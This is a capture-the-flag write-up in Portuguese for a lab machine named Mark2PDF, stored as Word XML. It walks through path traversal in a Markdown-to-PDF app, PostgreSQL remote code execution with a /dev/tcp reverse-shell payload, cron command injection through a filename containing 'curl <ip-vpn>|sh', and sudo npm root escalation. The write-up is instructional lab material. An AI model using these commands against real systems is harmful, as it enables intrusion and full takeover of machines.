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Mark2PDF</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>**Varredura nmap:**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13681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81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Observamos a presença da porta 80 hospedando um serviço web e a porta 5432 correspondente ao sistema de gerenciamento de banco de dados PostgreSQL.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Ao acessar a porta 80 para o serviço web, somos automaticamente redirecionados para mark2pdf.hc.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="2233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rect%252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30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Para resolver isso, é necessário mapear o endereço IP com o nome de domínio adicionando uma entrada no arquivo de hosts, conforme demonstrado na imagem abaixo:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="15078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s%252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7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 a aplicação novamente, observamos que ela se destina à conversão de arquivos Markdown para PDF. O próximo passo consiste em criar uma conta para efetuarmos login.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="25519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lic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9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o login bem-sucedido, temos a capacidade de enviar um arquivo Markdown para ser convertido em PDF. Neste momento, vamos realizar essa etapa.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="27971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ado%252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7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o envio de um arquivo Markdown para conversão em PDF, é possível visualizá-lo. Ao examinar a URL, identificamos um possível ponto de ataque para explorar a vulnerabilidade de Path Traversal. Portanto, vamos tentar explorar essa vulnerabilidade.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="18150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%252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5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interceptarmos a requisição utilizando o Burp Suite, conseguimos, por meio de uma travessia de diretórios (Path Traversal), ler o arquivo passwd.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="20641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d%252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41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a exploração bem sucedida, podemos agora tentar ler o código-fonte da aplicação. No entanto, como não conhecemos o caminho exato, podemos ler o arquivo /proc/self/cmdline que aponta para o diretório do processo atual. Isso nos fornecerá o caminho absoluto da aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="12011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1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fazermos um code review, não identificamos outras vulnerabilidades que possam proporcionar uma execução remota de código (RCE). No entanto, considerando que o banco de dados está exposto, podemos tentar ler o arquivo "db.js", que potencialmente contém as credenciais para acessá-lo.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="2053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36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2254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j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54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posse das credenciais, temos a capacidade de acessar o banco de dados.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>css</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>psql -U md2pdfuser -h [HOST] -d md2pdfdb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1342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e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42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pesquisar sobre as possibilidades no PostgreSQL, deparamos com o artigo abaixo, que sugere a obtenção de execução remota de código (RCE). No entanto, para alcançar esse objetivo, é necessário que nosso usuário seja um superusuário. Uma maneira de verificar essa condição é executar o seguinte comando SQL:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>plain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>SELECT usesuper FROM pguser WHERE usename = 'postgres';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>[5432,5433 - Pentesting Postgresql](https://book.hacktricks.xyz/network-services-pentesting/pentesting-postgresql#rce)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="12172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US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7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nosso usuário possui privilégios de superusuário, agora podemos inserir uma carga útil (payload) de shell reverso, seguindo o link fornecido.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Ouvinte do netcat para receber a conexão:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="14067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Payload reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>plain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>/bin/bash -c "sh -i &gt;&amp; /dev/tcp/&lt;ip-vpn&gt;/4444 0&gt;&amp;1"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3673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%252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73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temos shell:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="12861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3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61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Atualizando shell simples para TTYs totalmente interativos:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>plain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>script /dev/null -c bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Ctrl+Z</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>stty raw -echo;fg</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>export TERM=xterm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25361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%25203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36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termos shell, aparentemente precisamos escalar privilégios para o usuário mark2pdfuser. Ao examinarmos o arquivo "/etc/crontab", observamos uma tarefa cron associada a esse usuário, agendada para ser executada a cada 2 minutos.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="2386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ntab%252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6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dar uma olhada no conteúdo do script remove\excess\files.py localizado no diretório /opt.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Durante a análise do script, fica evidente a vulnerabilidade de command injection:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="22110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%252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1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 tivermos permissões de escrita no diretório "uploads/", teremos a possibilidade de explorá-lo. Entretanto, ao analisar a condição `if`, percebe-se que é necessário ter mais de 5 arquivos nesse diretório para que a função seja executada.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="113862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86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notar que temos permissão de escrita nesse diretório, então agora iremos criar nossa payload.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Vamos criar um arquivo chamado "index.html" na nossa máquina local, que conterá a nossa payload de shell reverso. Em seguida, vamos hospedá-lo utilizando um servidor Python.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="12129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%252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2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Agora, vamos acessar o diretório "/home/mark2pdfuser/webapp/uploads" e criaremos três arquivos vazios para garantir que a função seja executada.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>css</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>touch a b c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1921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2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isso, vamos criar o nome do arquivo. O nome do arquivo será a payload que vamos injetar para obter uma shell reversa.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>gherkin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>touch ';curl &lt;ip-vpn&gt;|sh;'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1297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ch%252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9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4067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 execução da cron, estabelecemos a conexão e adquirimos acesso ao shell.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="114835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2%2520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83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a home do usuário mark2pdfuser podemos obter a nossa primeira flag:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="181678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6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pegarmos a nossa primeira flag de usuário, é hora de escalarmos privilégios para obtermos a nossa última flag, para isso teremos que escalar para o usuário root.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Ao executarmos o comando `sudo -l`, observamos que temos permissões para executar `/usr/bin/npm *` com as permissões do usuário root, sem a necessidade de inserir a senha:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="134632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DOO-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6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o link abaixo, podemos seguir os passos para podermos escalarmos privilégios:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>[https://gtfobins.github.io/gtfobins/npm/#sudo](https://gtfobins.github.io/gtfobins/npm/#sudo)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>plain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>TF=$(mktemp -d)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>echo '{"scripts": {"preinstall": "/bin/sh"}}' &gt; $TF/package.json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>sudo npm -C $TF --unsafe-perm i</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Os comandos acima cria um diretório temporário, cria um arquivo package.json nesse diretório com um script de instalação que executa /bin/sh, e então usa o comando npm para instalar pacotes do Node.js no diretório temporário, com permissões do usuário root.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4572000" cy="8334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%252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3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94349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root%252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3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